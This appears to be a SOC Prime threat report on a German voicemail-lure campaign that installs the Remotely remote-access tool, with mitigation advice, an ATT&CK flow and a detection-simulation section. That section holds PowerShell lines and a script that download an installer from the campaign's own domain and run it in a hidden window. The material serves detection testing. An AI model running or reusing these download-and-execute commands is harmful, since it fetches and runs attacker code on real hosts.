SOC Prime Bias: Medium

06 Feb 2026 19:41

Voicemail Trap: German-Language Voicemail Lure Leads to Remote Access

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Voicemail Trap: German-Language Voicemail Lure Leads to Remote Access
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors are hosting German-language “voicemail” landing pages that entice users to download a BAT file. The script plays a benign audio decoy while quietly installing the legitimate Remotely remote monitoring tool. Once deployed, the RMM agent gives the attacker persistent remote access through attacker-controlled C2 infrastructure.

Investigation

Censys identified 86 compromised web properties on *.cadillac.ps domains distributing the malicious BAT. The script invokes a PowerShell installer hosted on remotely.billbutterworth.com, which pulls a Remotely ZIP package. The archive contains the Remotely agent components and a service that installs under C:\Program Files\Remotely.

Mitigation

Block *.cadillac.ps domains and remotely.billbutterworth.com at the DNS/proxy layer. Train users not to run unexpected BAT files or copy/paste PowerShell commands from unknown webpages. Deploy endpoint controls to detect Remotely service creation and suspicious install paths or unsigned tooling.

Response

Alert on creation of Remotely_Service and presence of Remotely_Agent.exe under Program Files. Hunt for voicemail.bat and the associated PowerShell installer activity. Isolate affected hosts, collect forensic artifacts, and rotate/revoke any credentials or tokens leveraged by the RMM agent.

"graph TB %% Class definitions classDef action fill:#99ccff %% Nodes node_content_injection["<b>Technique</b> – T1659 Content Injection<br/>Compromised web property delivers malicious link."] class node_content_injection action node_initial_user_exec["<b>Technique</b> – T1204.001 User Execution: Malicious Link<br/>Victim clicks malicious link to a compromised voicemail landing page."] class node_initial_user_exec action node_cmd_shell["<b>Technique</b> – T1059.003 Windows Command Shell<br/>BAT file (voicemail.bat) downloaded and executed."] class node_cmd_shell action node_powershell["<b>Technique</b> – T1059.001 PowerShell<br/>Install-Remotely.ps1 script installs Remotely RMM."] class node_powershell action node_system_service["<b>Technique</b> – T1569 System Services<br/>RMM installed as Windows service (Remotely_Service)."] class node_system_service action node_masquerading["<b>Technique</b> – T1036 Masquerading & T1036.008 Masquerade File Type<br/>BAT presented as media update; files placed in Program Files."] class node_masquerading action node_hide_artifacts["<b>Technique</b> – T1564 Hide Artifacts<br/>Installation artifacts hidden in C:\Program Files\Remotely."] class node_hide_artifacts action node_c2["<b>Technique</b> – T1102.002 Web Service Bidirectional Communication & T1071 Application Layer Protocol<br/>HTTPS communication with remote server."] class node_c2 action %% Connections node_content_injection –>|supports| node_initial_user_exec node_initial_user_exec –>|leads_to| node_cmd_shell node_cmd_shell –>|executes| node_powershell node_powershell –>|installs| node_system_service node_system_service –>|uses| node_masquerading node_system_service –>|uses| node_hide_artifacts node_system_service –>|establishes| node_c2 "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Phishing Delivery: The attacker sends an email with a German‑language voicemail lure attachment (HTML) that, when opened, redirects the victim to http://bannerbank.cadillac.ps/voicemail.html.
    2. Landing Page Execution: The landing page hosts a malicious PowerShell one‑liner that downloads and executes a remote‑management‑tool (RMM) installer.
    3. Process Creation: When the victim’s browser processes the page, PowerShell is invoked with a command line that explicitly includes the two strings the rule watches for.
    4. Resulting Telemetry: Windows logs Event ID 4688 with a CommandLine containing both “voicemail-themed landing page” and “bannerbank.cadillac.ps”, thereby satisfying the Sigma condition.

    The exact command used for the simulation:

    # Simulated malicious execution – contains both trigger strings
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`""
  • Regression Test Script: A self‑contained PowerShell script that reproduces the attack and can be run on any Windows host with the required logging enabled.

    <#
    .SYNOPSIS
        Simulates the German voicemail lure that triggers the Sigma detection rule.
    .DESCRIPTION
        Executes a PowerShell command line containing both required substrings.
    #>
    
    # Define malicious strings
    $lureText = "voicemail-themed landing page"
    $maliciousDomain = "bannerbank.cadillac.ps"
    
    # Build the one‑liner that will appear in the command line
    $payload = @"
    Write-Host '$lureText';
    Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe;
    Start-Process $env:TEMPinstaller.exe
    "@
    
    # Launch PowerShell with the crafted command line
    $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`""
    Write-Host "Launching malicious PowerShell command..."
    Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru
    
    # Optional: wait a few seconds to ensure logging
    Start-Sleep -Seconds 5
  • Cleanup Commands: Remove the downloaded installer and any residual processes.

    # Stop any lingering installer process
    Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Delete the temporary installer file
    $installerPath = "$env:TEMPinstaller.exe"
    if (Test-Path $installerPath) {
        Remove-Item $installerPath -Force
        Write-Host "Cleaned up $installerPath"
    }